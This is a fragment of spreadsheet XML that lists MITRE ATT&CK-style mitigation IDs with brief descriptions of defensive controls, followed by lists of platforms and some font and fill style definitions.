  </si>
  <si>
    <t xml:space="preserve">M1053
Data Backup
Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1053
Data Backup
Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1030
Network Segmentation
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M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1030
Network Segmentation
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M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1030
Network Segmentation
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M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1053
Data Backup
Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1016
Vulnerability Scanning
Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1016
Vulnerability Scanning
Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1034
Limit Hardware Installation
Block users or groups from installing or using unapproved hardware on systems, including USB devices.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1034
Limit Hardware Installation
Block users or groups from installing or using unapproved hardware on systems, including USB devices.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1019
Threat Intelligence Program
A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1016
Vulnerability Scanning
Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1030
Network Segmentation
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M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1033
Limit Software Installation
Block users or groups from installing unapproved software.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1033
Limit Software Installation
Block users or groups from installing unapproved software.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1033
Limit Software Installation
Block users or groups from installing unapproved software.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1052
User Account Control
Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1025
Privileged Process Integrity
Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1033
Limit Software Installation
Block users or groups from installing unapproved software.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1043
Credential Access Protection
Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
M1025
Privileged Process Integrity
Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
M1044
Restrict Library Loading
Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1033
Limit Software Installation
Block users or groups from installing unapproved software.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1019
Threat Intelligence Program
A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1056
Pre-compromise
This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1056
Pre-compromise
This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, Windows</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Office 365, Windows</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>IaaS, Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Network, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Network, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>Azure AD, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>Containers, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Containers, Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Azure AD, IaaS, Office 365</t>
  </si>
  <si>
    <t>Azure AD, Windows</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, Google Workspace, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365</t>
  </si>
  <si>
    <t>Network, Windows</t>
  </si>
  <si>
    <t>Containers, IaaS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Azure AD, IaaS</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Linux, Network, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, Network</t>
  </si>
  <si>
    <t>Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, IaaS, SaaS</t>
  </si>
  <si>
    <t>Azure AD, SaaS, Windows</t>
  </si>
  <si>
    <t>IaaS, Linux, Network, macOS</t>
  </si>
  <si>
    <t>Containers, Linux, Windows</t>
  </si>
  <si>
    <t>PRE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</si>
</sst>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6"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="16">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
